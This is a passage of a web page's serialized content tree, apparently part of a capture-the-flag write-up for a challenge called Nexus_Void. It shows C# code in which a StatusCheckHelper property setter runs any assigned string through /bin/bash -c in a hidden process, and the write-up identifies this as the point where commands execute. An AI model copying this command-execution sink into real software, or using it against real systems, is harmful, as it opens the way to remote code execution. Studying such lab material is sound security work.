{diskUsage}\");\n}\n",[38664],{"type":33,"tag":105,"props":38665,"children":38666},{"__ignoreMap":8},[38667,38700,38715,38735,38742,38772,38779,38817,38850,38857,38893,38925,38932,38968,39000,39007,39097],{"type":33,"tag":128,"props":38668,"children":38669},{"class":130,"line":131},[38670,38674,38679,38683,38687,38691,38695],{"type":33,"tag":128,"props":38671,"children":38672},{"style":312},[38673],{"type":38,"value":344},{"type":33,"tag":128,"props":38675,"children":38676},{"style":30339},[38677],{"type":38,"value":38678},"Route",{"type":33,"tag":128,"props":38680,"children":38681},{"style":312},[38682],{"type":38,"value":5566},{"type":33,"tag":128,"props":38684,"children":38685},{"style":676},[38686],{"type":38,"value":669},{"type":33,"tag":128,"props":38688,"children":38689},{"style":140},[38690],{"type":38,"value":38654},{"type":33,"tag":128,"props":38692,"children":38693},{"style":676},[38694],{"type":38,"value":669},{"type":33,"tag":128,"props":38696,"children":38697},{"style":312},[38698],{"type":38,"value":38699},")]\n",{"type":33,"tag":128,"props":38701,"children":38702},{"
class":130,"line":362},[38703,38707,38711],{"type":33,"tag":128,"props":38704,"children":38705},{"style":312},[38706],{"type":38,"value":344},{"type":33,"tag":128,"props":38708,"children":38709},{"style":30339},[38710],{"type":38,"value":36626},{"type":33,"tag":128,"props":38712,"children":38713},{"style":312},[38714],{"type":38,"value":3262},{"type":33,"tag":128,"props":38716,"children":38717},{"class":130,"line":403},[38718,38722,38726,38731],{"type":33,"tag":128,"props":38719,"children":38720},{"style":300},[38721],{"type":38,"value":25953},{"type":33,"tag":128,"props":38723,"children":38724},{"style":30339},[38725],{"type":38,"value":35103},{"type":33,"tag":128,"props":38727,"children":38728},{"style":135},[38729],{"type":38,"value":38730}," Status",{"type":33,"tag":128,"props":38732,"children":38733},{"style":312},[38734],{"type":38,"value":7857},{"type":33,"tag":128,"props":38736,"children":38737},{"class":130,"line":739},[38738],{"type":33,"tag":128,"props":38739,"children":38740},{"style":312},[38741],{"type":38,"value":650},{"type":33,"tag":128,"props":38743,"children":38744},{"class":130,"line":765},[38745,38750,38755,38759,38763,38768],{"type":33,"tag":128,"props":38746,"children":38747},{"style":30339},[38748],{"type":38,"value":38749},"  StatusCheckHelper",{"type":33,"tag":128,"props":38751,"children":38752},{"style":135},[38753],{"type":38,"value":38754}," statusCheckHelper",{"type":33,"tag":128,"props":38756,"children":38757},{"style":312},[38758],{"type":38,"value":5657},{"type":33,"tag":128,"props":38760,"children":38761},{"style":300},[38762],{"type":38,"value":13061},{"type":33,"tag":128,"props":38764,"children":38765},{"style":30339},[38766],{"type":38,"value":38767}," 
StatusCheckHelper",{"type":33,"tag":128,"props":38769,"children":38770},{"style":312},[38771],{"type":38,"value":15496},{"type":33,"tag":128,"props":38773,"children":38774},{"class":130,"line":804},[38775],{"type":33,"tag":128,"props":38776,"children":38777},{"emptyLinePlaceholder":896},[38778],{"type":38,"value":899},{"type":33,"tag":128,"props":38780,"children":38781},{"class":130,"line":839},[38782,38787,38791,38796,38800,38804,38809,38813],{"type":33,"tag":128,"props":38783,"children":38784},{"style":306},[38785],{"type":38,"value":38786},"  statusCheckHelper",{"type":33,"tag":128,"props":38788,"children":38789},{"style":312},[38790],{"type":38,"value":215},{"type":33,"tag":128,"props":38792,"children":38793},{"style":306},[38794],{"type":38,"value":38795},"command",{"type":33,"tag":128,"props":38797,"children":38798},{"style":312},[38799],{"type":38,"value":5657},{"type":33,"tag":128,"props":38801,"children":38802},{"style":676},[38803],{"type":38,"value":679},{"type":33,"tag":128,"props":38805,"children":38806},{"style":140},[38807],{"type":38,"value":38808},"bash /tmp/cpu.sh",{"type":33,"tag":128,"props":38810,"children":38811},{"style":676},[38812],{"type":38,"value":669},{"type":33,"tag":128,"props":38814,"children":38815},{"style":312},[38816],{"type":38,"value":5676},{"type":33,"tag":128,"props":38818,"children":38819},{"class":130,"line":848},[38820,38825,38830,38834,38838,38842,38846],{"type":33,"tag":128,"props":38821,"children":38822},{"style":1576},[38823],{"type":38,"value":38824},"  string",{"type":33,"tag":128,"props":38826,"children":38827},{"style":135},[38828],{"type":38,"value":38829}," 
cpuUsage",{"type":33,"tag":128,"props":38831,"children":38832},{"style":312},[38833],{"type":38,"value":5657},{"type":33,"tag":128,"props":38835,"children":38836},{"style":306},[38837],{"type":38,"value":38754},{"type":33,"tag":128,"props":38839,"children":38840},{"style":312},[38841],{"type":38,"value":215},{"type":33,"tag":128,"props":38843,"children":38844},{"style":306},[38845],{"type":38,"value":15036},{"type":33,"tag":128,"props":38847,"children":38848},{"style":312},[38849],{"type":38,"value":5676},{"type":33,"tag":128,"props":38851,"children":38852},{"class":130,"line":976},[38853],{"type":33,"tag":128,"props":38854,"children":38855},{"emptyLinePlaceholder":896},[38856],{"type":38,"value":899},{"type":33,"tag":128,"props":38858,"children":38859},{"class":130,"line":988},[38860,38864,38868,38872,38876,38880,38885,38889],{"type":33,"tag":128,"props":38861,"children":38862},{"style":306},[38863],{"type":38,"value":38786},{"type":33,"tag":128,"props":38865,"children":38866},{"style":312},[38867],{"type":38,"value":215},{"type":33,"tag":128,"props":38869,"children":38870},{"style":306},[38871],{"type":38,"value":38795},{"type":33,"tag":128,"props":38873,"children":38874},{"style":312},[38875],{"type":38,"value":5657},{"type":33,"tag":128,"props":38877,"children":38878},{"style":676},[38879],{"type":38,"value":679},{"type":33,"tag":128,"props":38881,"children":38882},{"style":140},[38883],{"type":38,"value":38884},"bash /tmp/mem.sh",{"type":33,"tag":128,"props":38886,"children":38887},{"style":676},[38888],{"type":38,"value":669},{"type":33,"tag":128,"props":38890,"children":38891},{"style":312},[38892],{"type":38,"value":5676},{"type":33,"tag":128,"props":38894,"children":38895},{"class":130,"line":1001},[38896,38900,38905,38909,38913,38917,38921],{"type":33,"tag":128,"props":38897,"children":38898},{"style":1576},[38899],{"type":38,"value":38824},{"type":33,"tag":128,"props":38901,"children":38902},{"style":135},[38903],{"type":38,"value":38904}," 
memoryUsage",{"type":33,"tag":128,"props":38906,"children":38907},{"style":312},[38908],{"type":38,"value":5657},{"type":33,"tag":128,"props":38910,"children":38911},{"style":306},[38912],{"type":38,"value":38754},{"type":33,"tag":128,"props":38914,"children":38915},{"style":312},[38916],{"type":38,"value":215},{"type":33,"tag":128,"props":38918,"children":38919},{"style":306},[38920],{"type":38,"value":15036},{"type":33,"tag":128,"props":38922,"children":38923},{"style":312},[38924],{"type":38,"value":5676},{"type":33,"tag":128,"props":38926,"children":38927},{"class":130,"line":1014},[38928],{"type":33,"tag":128,"props":38929,"children":38930},{"emptyLinePlaceholder":896},[38931],{"type":38,"value":899},{"type":33,"tag":128,"props":38933,"children":38934},{"class":130,"line":1026},[38935,38939,38943,38947,38951,38955,38960,38964],{"type":33,"tag":128,"props":38936,"children":38937},{"style":306},[38938],{"type":38,"value":38786},{"type":33,"tag":128,"props":38940,"children":38941},{"style":312},[38942],{"type":38,"value":215},{"type":33,"tag":128,"props":38944,"children":38945},{"style":306},[38946],{"type":38,"value":38795},{"type":33,"tag":128,"props":38948,"children":38949},{"style":312},[38950],{"type":38,"value":5657},{"type":33,"tag":128,"props":38952,"children":38953},{"style":676},[38954],{"type":38,"value":679},{"type":33,"tag":128,"props":38956,"children":38957},{"style":140},[38958],{"type":38,"value":38959},"bash /tmp/disk.sh",{"type":33,"tag":128,"props":38961,"children":38962},{"style":676},[38963],{"type":38,"value":669},{"type":33,"tag":128,"props":38965,"children":38966},{"style":312},[38967],{"type":38,"value":5676},{"type":33,"tag":128,"props":38969,"children":38970},{"class":130,"line":1038},[38971,38975,38980,38984,38988,38992,38996],{"type":33,"tag":128,"props":38972,"children":38973},{"style":1576},[38974],{"type":38,"value":38824},{"type":33,"tag":128,"props":38976,"children":38977},{"style":135},[38978],{"type":38,"value":38979}," 
diskUsage",{"type":33,"tag":128,"props":38981,"children":38982},{"style":312},[38983],{"type":38,"value":5657},{"type":33,"tag":128,"props":38985,"children":38986},{"style":306},[38987],{"type":38,"value":38754},{"type":33,"tag":128,"props":38989,"children":38990},{"style":312},[38991],{"type":38,"value":215},{"type":33,"tag":128,"props":38993,"children":38994},{"style":306},[38995],{"type":38,"value":15036},{"type":33,"tag":128,"props":38997,"children":38998},{"style":312},[38999],{"type":38,"value":5676},{"type":33,"tag":128,"props":39001,"children":39002},{"class":130,"line":1051},[39003],{"type":33,"tag":128,"props":39004,"children":39005},{"emptyLinePlaceholder":896},[39006],{"type":38,"value":899},{"type":33,"tag":128,"props":39008,"children":39009},{"class":130,"line":1063},[39010,39014,39018,39022,39027,39032,39036,39041,39045,39049,39054,39058,39063,39067,39071,39076,39080,39085,39089,39093],{"type":33,"tag":128,"props":39011,"children":39012},{"style":1576},[39013],{"type":38,"value":13056},{"type":33,"tag":128,"props":39015,"children":39016},{"style":135},[39017],{"type":38,"value":35967},{"type":33,"tag":128,"props":39019,"children":39020},{"style":312},[39021],{"type":38,"value":5566},{"type":33,"tag":128,"props":39023,"children":39024},{"style":676},[39025],{"type":38,"value":39026},"$\"",{"type":33,"tag":128,"props":39028,"children":39029},{"style":140},[39030],{"type":38,"value":39031},"CPU Usage: ",{"type":33,"tag":128,"props":39033,"children":39034},{"style":312},[39035],{"type":38,"value":7246},{"type":33,"tag":128,"props":39037,"children":39038},{"style":140},[39039],{"type":38,"value":39040},"cpuUsage",{"type":33,"tag":128,"props":39042,"children":39043},{"style":312},[39044],{"type":38,"value":5730},{"type":33,"tag":128,"props":39046,"children":39047},{"style":151},[39048],{"type":38,"value":38268},{"type":33,"tag":128,"props":39050,"children":39051},{"style":140},[39052],{"type":38,"value":39053},"Memory Usage: 
",{"type":33,"tag":128,"props":39055,"children":39056},{"style":312},[39057],{"type":38,"value":7246},{"type":33,"tag":128,"props":39059,"children":39060},{"style":140},[39061],{"type":38,"value":39062},"memoryUsage",{"type":33,"tag":128,"props":39064,"children":39065},{"style":312},[39066],{"type":38,"value":5730},{"type":33,"tag":128,"props":39068,"children":39069},{"style":151},[39070],{"type":38,"value":38268},{"type":33,"tag":128,"props":39072,"children":39073},{"style":140},[39074],{"type":38,"value":39075},"Disk Space: ",{"type":33,"tag":128,"props":39077,"children":39078},{"style":312},[39079],{"type":38,"value":7246},{"type":33,"tag":128,"props":39081,"children":39082},{"style":140},[39083],{"type":38,"value":39084},"diskUsage",{"type":33,"tag":128,"props":39086,"children":39087},{"style":312},[39088],{"type":38,"value":5730},{"type":33,"tag":128,"props":39090,"children":39091},{"style":676},[39092],{"type":38,"value":669},{"type":33,"tag":128,"props":39094,"children":39095},{"style":312},[39096],{"type":38,"value":5815},{"type":33,"tag":128,"props":39098,"children":39099},{"class":130,"line":1076},[39100],{"type":33,"tag":128,"props":39101,"children":39102},{"style":312},[39103],{"type":38,"value":854},{"type":33,"tag":47,"props":39105,"children":39106},{},[39107,39109,39115],{"type":38,"value":39108},"And the ",{"type":33,"tag":105,"props":39110,"children":39112},{"className":39111},[],[39113],{"type":38,"value":39114},"StatusCheckHelper",{"type":38,"value":39116}," class is as follows:",{"type":33,"tag":114,"props":39118,"children":39119},{"lang":35074},[39120],{"type":33,"tag":119,"props":39121,"children":39123},{"code":39122,"language":35074,"meta":8,"className":35079,"style":8},"using System.Diagnostics;\n\nnamespace Nexus_Void.Helpers\n{\n    public class StatusCheckHelper\n    {\n        public string output { get; set; }\n        private string _command;\n        public string command \n        {\n            get { return _command; }\n\n           
 set\n            {\n                _command = value;\n                try\n                {\n                    var p = new System.Diagnostics.Process();\n\n                    var processStartInfo = new ProcessStartInfo()\n                    {\n                        WindowStyle = ProcessWindowStyle.Hidden,\n                        FileName = $\"/bin/bash\",\n                        WorkingDirectory = \"/tmp\",\n                        Arguments = $\"-c \\\"{_command}\\\"\",\n                        RedirectStandardOutput = true,\n                        RedirectStandardError = true,\n                        UseShellExecute = false\n                    };\n                    p.StartInfo = processStartInfo;\n                    p.Start();\n                    output = p.StandardOutput.ReadToEnd();\n                }\n                [...]\n            }\n        }\n\n\n    }\n}\n",[39124],{"type":33,"tag":105,"props":39125,"children":39126},{"__ignoreMap":8},[39127,39151,39158,39177,39184,39200,39207,39247,39268,39287,39294,39323,39330,39338,39345,39365,39373,39381,39426,39433,39462,39470,39500,39529,39557,39607,39627,39647,39664,39672,39701,39721,39759,39767,39787,39794,39801,39808,39815,39822],{"type":33,"tag":128,"props":39128,"children":39129},{"class":130,"line":131},[39130,39134,39138,39142,39147],{"type":33,"tag":128,"props":39131,"children":39132},{"style":1576},[39133],{"type":38,"value":37044},{"type":33,"tag":128,"props":39135,"children":39136},{"style":30339},[39137],{"type":38,"value":37759},{"type":33,"tag":128,"props":39139,"children":39140},{"style":312},[39141],{"type":38,"value":215},{"type":33,"tag":128,"props":39143,"children":39144},{"style":30339},[39145],{"type":38,"value":39146},"Diagnostics",{"type":33,"tag":128,"props":39148,"children":39149},{"style":312},[39150],{"type":38,"value":5676},{"type":33,"tag":128,"props":39152,"children":39153},{"class":130,"line":362},[39154],{"type":33,"tag":128,"props":39155,"children":39156},{"emptyL
inePlaceholder":896},[39157],{"type":38,"value":899},{"type":33,"tag":128,"props":39159,"children":39160},{"class":130,"line":403},[39161,39165,39169,39173],{"type":33,"tag":128,"props":39162,"children":39163},{"style":300},[39164],{"type":38,"value":37102},{"type":33,"tag":128,"props":39166,"children":39167},{"style":30339},[39168],{"type":38,"value":37074},{"type":33,"tag":128,"props":39170,"children":39171},{"style":312},[39172],{"type":38,"value":215},{"type":33,"tag":128,"props":39174,"children":39175},{"style":30339},[39176],{"type":38,"value":37115},{"type":33,"tag":128,"props":39178,"children":39179},{"class":130,"line":739},[39180],{"type":33,"tag":128,"props":39181,"children":39182},{"style":312},[39183],{"type":38,"value":650},{"type":33,"tag":128,"props":39185,"children":39186},{"class":130,"line":765},[39187,39191,39195],{"type":33,"tag":128,"props":39188,"children":39189},{"style":300},[39190],{"type":38,"value":37130},{"type":33,"tag":128,"props":39192,"children":39193},{"style":300},[39194],{"type":38,"value":6009},{"type":33,"tag":128,"props":39196,"children":39197},{"style":30339},[39198],{"type":38,"value":39199}," StatusCheckHelper\n",{"type":33,"tag":128,"props":39201,"children":39202},{"class":130,"line":804},[39203],{"type":33,"tag":128,"props":39204,"children":39205},{"style":312},[39206],{"type":38,"value":12699},{"type":33,"tag":128,"props":39208,"children":39209},{"class":130,"line":839},[39210,39214,39218,39223,39227,39231,39235,39239,39243],{"type":33,"tag":128,"props":39211,"children":39212},{"style":300},[39213],{"type":38,"value":37154},{"type":33,"tag":128,"props":39215,"children":39216},{"style":1576},[39217],{"type":38,"value":35330},{"type":33,"tag":128,"props":39219,"children":39220},{"style":135},[39221],{"type":38,"value":39222}," 
output",{"type":33,"tag":128,"props":39224,"children":39225},{"style":312},[39226],{"type":38,"value":5642},{"type":33,"tag":128,"props":39228,"children":39229},{"style":300},[39230],{"type":38,"value":37871},{"type":33,"tag":128,"props":39232,"children":39233},{"style":312},[39234],{"type":38,"value":35231},{"type":33,"tag":128,"props":39236,"children":39237},{"style":300},[39238],{"type":38,"value":186},{"type":33,"tag":128,"props":39240,"children":39241},{"style":312},[39242],{"type":38,"value":35231},{"type":33,"tag":128,"props":39244,"children":39245},{"style":312},[39246],{"type":38,"value":37888},{"type":33,"tag":128,"props":39248,"children":39249},{"class":130,"line":848},[39250,39255,39259,39264],{"type":33,"tag":128,"props":39251,"children":39252},{"style":300},[39253],{"type":38,"value":39254},"        private",{"type":33,"tag":128,"props":39256,"children":39257},{"style":1576},[39258],{"type":38,"value":35330},{"type":33,"tag":128,"props":39260,"children":39261},{"style":135},[39262],{"type":38,"value":39263}," 
_command",{"type":33,"tag":128,"props":39265,"children":39266},{"style":312},[39267],{"type":38,"value":5676},{"type":33,"tag":128,"props":39269,"children":39270},{"class":130,"line":976},[39271,39275,39279,39283],{"type":33,"tag":128,"props":39272,"children":39273},{"style":300},[39274],{"type":38,"value":37154},{"type":33,"tag":128,"props":39276,"children":39277},{"style":1576},[39278],{"type":38,"value":35330},{"type":33,"tag":128,"props":39280,"children":39281},{"style":135},[39282],{"type":38,"value":4732},{"type":33,"tag":128,"props":39284,"children":39285},{"style":323},[39286],{"type":38,"value":2008},{"type":33,"tag":128,"props":39288,"children":39289},{"class":130,"line":988},[39290],{"type":33,"tag":128,"props":39291,"children":39292},{"style":312},[39293],{"type":38,"value":35771},{"type":33,"tag":128,"props":39295,"children":39296},{"class":130,"line":1001},[39297,39302,39306,39311,39315,39319],{"type":33,"tag":128,"props":39298,"children":39299},{"style":300},[39300],{"type":38,"value":39301},"            get",{"type":33,"tag":128,"props":39303,"children":39304},{"style":312},[39305],{"type":38,"value":5642},{"type":33,"tag":128,"props":39307,"children":39308},{"style":1576},[39309],{"type":38,"value":39310}," return",{"type":33,"tag":128,"props":39312,"children":39313},{"style":306},[39314],{"type":38,"value":39263},{"type":33,"tag":128,"props":39316,"children":39317},{"style":312},[39318],{"type":38,"value":35231},{"type":33,"tag":128,"props":39320,"children":39321},{"style":312},[39322],{"type":38,"value":37888},{"type":33,"tag":128,"props":39324,"children":39325},{"class":130,"line":1014},[39326],{"type":33,"tag":128,"props":39327,"children":39328},{"emptyLinePlaceholder":896},[39329],{"type":38,"value":899},{"type":33,"tag":128,"props":39331,"children":39332},{"class":130,"line":1026},[39333],{"type":33,"tag":128,"props":39334,"children":39335},{"style":300},[39336],{"type":38,"value":39337},"            
set\n",{"type":33,"tag":128,"props":39339,"children":39340},{"class":130,"line":1038},[39341],{"type":33,"tag":128,"props":39342,"children":39343},{"style":312},[39344],{"type":38,"value":35954},{"type":33,"tag":128,"props":39346,"children":39347},{"class":130,"line":1051},[39348,39353,39357,39361],{"type":33,"tag":128,"props":39349,"children":39350},{"style":306},[39351],{"type":38,"value":39352},"                _command",{"type":33,"tag":128,"props":39354,"children":39355},{"style":312},[39356],{"type":38,"value":5657},{"type":33,"tag":128,"props":39358,"children":39359},{"style":306},[39360],{"type":38,"value":13031},{"type":33,"tag":128,"props":39362,"children":39363},{"style":312},[39364],{"type":38,"value":5676},{"type":33,"tag":128,"props":39366,"children":39367},{"class":130,"line":1063},[39368],{"type":33,"tag":128,"props":39369,"children":39370},{"style":1576},[39371],{"type":38,"value":39372},"                try\n",{"type":33,"tag":128,"props":39374,"children":39375},{"class":130,"line":1076},[39376],{"type":33,"tag":128,"props":39377,"children":39378},{"style":312},[39379],{"type":38,"value":39380},"                {\n",{"type":33,"tag":128,"props":39382,"children":39383},{"class":130,"line":1089},[39384,39389,39393,39397,39401,39405,39409,39413,39417,39422],{"type":33,"tag":128,"props":39385,"children":39386},{"style":300},[39387],{"type":38,"value":39388},"                    
var",{"type":33,"tag":128,"props":39390,"children":39391},{"style":135},[39392],{"type":38,"value":15978},{"type":33,"tag":128,"props":39394,"children":39395},{"style":312},[39396],{"type":38,"value":5657},{"type":33,"tag":128,"props":39398,"children":39399},{"style":300},[39400],{"type":38,"value":13061},{"type":33,"tag":128,"props":39402,"children":39403},{"style":30339},[39404],{"type":38,"value":37759},{"type":33,"tag":128,"props":39406,"children":39407},{"style":312},[39408],{"type":38,"value":215},{"type":33,"tag":128,"props":39410,"children":39411},{"style":30339},[39412],{"type":38,"value":39146},{"type":33,"tag":128,"props":39414,"children":39415},{"style":312},[39416],{"type":38,"value":215},{"type":33,"tag":128,"props":39418,"children":39419},{"style":30339},[39420],{"type":38,"value":39421},"Process",{"type":33,"tag":128,"props":39423,"children":39424},{"style":312},[39425],{"type":38,"value":15496},{"type":33,"tag":128,"props":39427,"children":39428},{"class":130,"line":1101},[39429],{"type":33,"tag":128,"props":39430,"children":39431},{"emptyLinePlaceholder":896},[39432],{"type":38,"value":899},{"type":33,"tag":128,"props":39434,"children":39435},{"class":130,"line":1114},[39436,39440,39445,39449,39453,39458],{"type":33,"tag":128,"props":39437,"children":39438},{"style":300},[39439],{"type":38,"value":39388},{"type":33,"tag":128,"props":39441,"children":39442},{"style":135},[39443],{"type":38,"value":39444}," processStartInfo",{"type":33,"tag":128,"props":39446,"children":39447},{"style":312},[39448],{"type":38,"value":5657},{"type":33,"tag":128,"props":39450,"children":39451},{"style":300},[39452],{"type":38,"value":13061},{"type":33,"tag":128,"props":39454,"children":39455},{"style":30339},[39456],{"type":38,"value":39457}," 
ProcessStartInfo",{"type":33,"tag":128,"props":39459,"children":39460},{"style":312},[39461],{"type":38,"value":7857},{"type":33,"tag":128,"props":39463,"children":39464},{"class":130,"line":1127},[39465],{"type":33,"tag":128,"props":39466,"children":39467},{"style":312},[39468],{"type":38,"value":39469},"                    {\n",{"type":33,"tag":128,"props":39471,"children":39472},{"class":130,"line":1139},[39473,39478,39482,39487,39491,39496],{"type":33,"tag":128,"props":39474,"children":39475},{"style":306},[39476],{"type":38,"value":39477},"                        WindowStyle",{"type":33,"tag":128,"props":39479,"children":39480},{"style":312},[39481],{"type":38,"value":5657},{"type":33,"tag":128,"props":39483,"children":39484},{"style":306},[39485],{"type":38,"value":39486}," ProcessWindowStyle",{"type":33,"tag":128,"props":39488,"children":39489},{"style":312},[39490],{"type":38,"value":215},{"type":33,"tag":128,"props":39492,"children":39493},{"style":306},[39494],{"type":38,"value":39495},"Hidden",{"type":33,"tag":128,"props":39497,"children":39498},{"style":312},[39499],{"type":38,"value":693},{"type":33,"tag":128,"props":39501,"children":39502},{"class":130,"line":1152},[39503,39508,39512,39516,39521,39525],{"type":33,"tag":128,"props":39504,"children":39505},{"style":306},[39506],{"type":38,"value":39507},"                        
FileName",{"type":33,"tag":128,"props":39509,"children":39510},{"style":312},[39511],{"type":38,"value":5657},{"type":33,"tag":128,"props":39513,"children":39514},{"style":676},[39515],{"type":38,"value":35201},{"type":33,"tag":128,"props":39517,"children":39518},{"style":140},[39519],{"type":38,"value":39520},"/bin/bash",{"type":33,"tag":128,"props":39522,"children":39523},{"style":676},[39524],{"type":38,"value":669},{"type":33,"tag":128,"props":39526,"children":39527},{"style":312},[39528],{"type":38,"value":693},{"type":33,"tag":128,"props":39530,"children":39531},{"class":130,"line":1165},[39532,39537,39541,39545,39549,39553],{"type":33,"tag":128,"props":39533,"children":39534},{"style":306},[39535],{"type":38,"value":39536},"                        WorkingDirectory",{"type":33,"tag":128,"props":39538,"children":39539},{"style":312},[39540],{"type":38,"value":5657},{"type":33,"tag":128,"props":39542,"children":39543},{"style":676},[39544],{"type":38,"value":679},{"type":33,"tag":128,"props":39546,"children":39547},{"style":140},[39548],{"type":38,"value":9050},{"type":33,"tag":128,"props":39550,"children":39551},{"style":676},[39552],{"type":38,"value":669},{"type":33,"tag":128,"props":39554,"children":39555},{"style":312},[39556],{"type":38,"value":693},{"type":33,"tag":128,"props":39558,"children":39559},{"class":130,"line":1177},[39560,39565,39569,39573,39578,39582,39586,39591,39595,39599,39603],{"type":33,"tag":128,"props":39561,"children":39562},{"style":306},[39563],{"type":38,"value":39564},"                        Arguments",{"type":33,"tag":128,"props":39566,"children":39567},{"style":312},[39568],{"type":38,"value":5657},{"type":33,"tag":128,"props":39570,"children":39571},{"style":676},[39572],{"type":38,"value":35201},{"type":33,"tag":128,"props":39574,"children":39575},{"style":140},[39576],{"type":38,"value":39577},"-c 
",{"type":33,"tag":128,"props":39579,"children":39580},{"style":151},[39581],{"type":38,"value":10544},{"type":33,"tag":128,"props":39583,"children":39584},{"style":312},[39585],{"type":38,"value":7246},{"type":33,"tag":128,"props":39587,"children":39588},{"style":140},[39589],{"type":38,"value":39590},"_command",{"type":33,"tag":128,"props":39592,"children":39593},{"style":312},[39594],{"type":38,"value":5730},{"type":33,"tag":128,"props":39596,"children":39597},{"style":151},[39598],{"type":38,"value":10544},{"type":33,"tag":128,"props":39600,"children":39601},{"style":676},[39602],{"type":38,"value":669},{"type":33,"tag":128,"props":39604,"children":39605},{"style":312},[39606],{"type":38,"value":693},{"type":33,"tag":128,"props":39608,"children":39609},{"class":130,"line":1189},[39610,39615,39619,39623],{"type":33,"tag":128,"props":39611,"children":39612},{"style":306},[39613],{"type":38,"value":39614},"                        RedirectStandardOutput",{"type":33,"tag":128,"props":39616,"children":39617},{"style":312},[39618],{"type":38,"value":5657},{"type":33,"tag":128,"props":39620,"children":39621},{"style":1576},[39622],{"type":38,"value":5850},{"type":33,"tag":128,"props":39624,"children":39625},{"style":312},[39626],{"type":38,"value":693},{"type":33,"tag":128,"props":39628,"children":39629},{"class":130,"line":1202},[39630,39635,39639,39643],{"type":33,"tag":128,"props":39631,"children":39632},{"style":306},[39633],{"type":38,"value":39634},"                        
RedirectStandardError",{"type":33,"tag":128,"props":39636,"children":39637},{"style":312},[39638],{"type":38,"value":5657},{"type":33,"tag":128,"props":39640,"children":39641},{"style":1576},[39642],{"type":38,"value":5850},{"type":33,"tag":128,"props":39644,"children":39645},{"style":312},[39646],{"type":38,"value":693},{"type":33,"tag":128,"props":39648,"children":39649},{"class":130,"line":1214},[39650,39655,39659],{"type":33,"tag":128,"props":39651,"children":39652},{"style":306},[39653],{"type":38,"value":39654},"                        UseShellExecute",{"type":33,"tag":128,"props":39656,"children":39657},{"style":312},[39658],{"type":38,"value":5657},{"type":33,"tag":128,"props":39660,"children":39661},{"style":1576},[39662],{"type":38,"value":39663}," false\n",{"type":33,"tag":128,"props":39665,"children":39666},{"class":130,"line":1226},[39667],{"type":33,"tag":128,"props":39668,"children":39669},{"style":312},[39670],{"type":38,"value":39671},"                    };\n",{"type":33,"tag":128,"props":39673,"children":39674},{"class":130,"line":1239},[39675,39680,39684,39689,39693,39697],{"type":33,"tag":128,"props":39676,"children":39677},{"style":306},[39678],{"type":38,"value":39679},"                    
p",{"type":33,"tag":128,"props":39681,"children":39682},{"style":312},[39683],{"type":38,"value":215},{"type":33,"tag":128,"props":39685,"children":39686},{"style":306},[39687],{"type":38,"value":39688},"StartInfo",{"type":33,"tag":128,"props":39690,"children":39691},{"style":312},[39692],{"type":38,"value":5657},{"type":33,"tag":128,"props":39694,"children":39695},{"style":306},[39696],{"type":38,"value":39444},{"type":33,"tag":128,"props":39698,"children":39699},{"style":312},[39700],{"type":38,"value":5676},{"type":33,"tag":128,"props":39702,"children":39703},{"class":130,"line":1251},[39704,39708,39712,39717],{"type":33,"tag":128,"props":39705,"children":39706},{"style":306},[39707],{"type":38,"value":39679},{"type":33,"tag":128,"props":39709,"children":39710},{"style":312},[39711],{"type":38,"value":215},{"type":33,"tag":128,"props":39713,"children":39714},{"style":135},[39715],{"type":38,"value":39716},"Start",{"type":33,"tag":128,"props":39718,"children":39719},{"style":312},[39720],{"type":38,"value":15496},{"type":33,"tag":128,"props":39722,"children":39723},{"class":130,"line":1263},[39724,39729,39733,39737,39741,39746,39750,39755],{"type":33,"tag":128,"props":39725,"children":39726},{"style":306},[39727],{"type":38,"value":39728},"                    
output",{"type":33,"tag":128,"props":39730,"children":39731},{"style":312},[39732],{"type":38,"value":5657},{"type":33,"tag":128,"props":39734,"children":39735},{"style":306},[39736],{"type":38,"value":15978},{"type":33,"tag":128,"props":39738,"children":39739},{"style":312},[39740],{"type":38,"value":215},{"type":33,"tag":128,"props":39742,"children":39743},{"style":306},[39744],{"type":38,"value":39745},"StandardOutput",{"type":33,"tag":128,"props":39747,"children":39748},{"style":312},[39749],{"type":38,"value":215},{"type":33,"tag":128,"props":39751,"children":39752},{"style":135},[39753],{"type":38,"value":39754},"ReadToEnd",{"type":33,"tag":128,"props":39756,"children":39757},{"style":312},[39758],{"type":38,"value":15496},{"type":33,"tag":128,"props":39760,"children":39761},{"class":130,"line":1276},[39762],{"type":33,"tag":128,"props":39763,"children":39764},{"style":312},[39765],{"type":38,"value":39766},"                }\n",{"type":33,"tag":128,"props":39768,"children":39769},{"class":130,"line":1288},[39770,39775,39779,39783],{"type":33,"tag":128,"props":39771,"children":39772},{"style":312},[39773],{"type":38,"value":39774},"                
[",{"type":33,"tag":128,"props":39776,"children":39777},{"style":300},[39778],{"type":38,"value":35256},{"type":33,"tag":128,"props":39780,"children":39781},{"style":323},[39782],{"type":38,"value":215},{"type":33,"tag":128,"props":39784,"children":39785},{"style":312},[39786],{"type":38,"value":3262},{"type":33,"tag":128,"props":39788,"children":39789},{"class":130,"line":1300},[39790],{"type":33,"tag":128,"props":39791,"children":39792},{"style":312},[39793],{"type":38,"value":35996},{"type":33,"tag":128,"props":39795,"children":39796},{"class":130,"line":1313},[39797],{"type":33,"tag":128,"props":39798,"children":39799},{"style":312},[39800],{"type":38,"value":15318},{"type":33,"tag":128,"props":39802,"children":39803},{"class":130,"line":1327},[39804],{"type":33,"tag":128,"props":39805,"children":39806},{"emptyLinePlaceholder":896},[39807],{"type":38,"value":899},{"type":33,"tag":128,"props":39809,"children":39810},{"class":130,"line":11196},[39811],{"type":33,"tag":128,"props":39812,"children":39813},{"emptyLinePlaceholder":896},[39814],{"type":38,"value":899},{"type":33,"tag":128,"props":39816,"children":39817},{"class":130,"line":11204},[39818],{"type":33,"tag":128,"props":39819,"children":39820},{"style":312},[39821],{"type":38,"value":6760},{"type":33,"tag":128,"props":39823,"children":39824},{"class":130,"line":11213},[39825],{"type":33,"tag":128,"props":39826,"children":39827},{"style":312},[39828],{"type":38,"value":854},{"type":33,"tag":47,"props":39830,"children":39831},{},[39832,39834,39839],{"type":38,"value":39833},"We can see that it is when setting the value of the ",{"type":33,"tag":105,"props":39835,"children":39837},{"className":39836},[],[39838],{"type":38,"value":38795},{"type":38,"value":39840}," attribute that the system function is called. 
